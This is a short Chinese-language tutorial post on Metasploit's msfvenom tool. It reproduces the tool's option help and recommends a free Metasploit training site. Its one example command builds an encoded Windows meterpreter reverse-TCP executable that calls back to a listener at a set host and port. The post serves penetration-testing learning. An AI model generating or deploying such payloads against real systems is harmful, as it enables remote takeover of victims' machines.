有木有常常需要把msfpayload获得的内容通过R命令导入管道输出至msfencode中进行编码,有木有觉得这一切很麻烦,
metasploit的开发人员早就想到了。msfvenom是msfpayload和msfencode的结合体,用起来更方便了。
Usage:msfvenom [options] <var=val>
Options:
-p, --payload <payload> Payload to use. Specify a ‘-‘ or stdin to use custom payloads
-l, --list [module_type] List a module type example: payloads, encoders, nops, all
-n, --nopsled <length> Prepend a nopsled of [length] size on to the payload
-f, --format <format> Output format (use --help-formats for a list)
-e, --encoder [encoder] The encoder to use
-a, --arch <architecture> The architecture to use:
--platform <platform> The platform of the payload
-s, --space <length> The maximum size of the resulting payload
-b, --bad-chars <list> The list of characters to avoid example: ‘\x00\xff‘
-i, --iterations <count> The number of times to encode the payload
-c, --add-code <path> Specify an additional win32 shellcode file to include
-x, --template <path> Specify a custom executable file to use as a template
-k, --keep Preserve the template behavior and inject the payload as a new thread
-o, --options List the payload‘s standard options
-h, --help Show this message
--help-formats List available formats
example:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.1 LPORT=4444 -e x86/shikata_ga_nai -b ‘0x00‘ -i 5 -f exe >test.exe
同时分享一个比较好的metasploit学习网站:
http://www.offensive-security.com/metasploit-unleashed/Main_Page
免费学习,捐赠的资金用于资助贫困地区的教育。
metasploit之msfvenom功能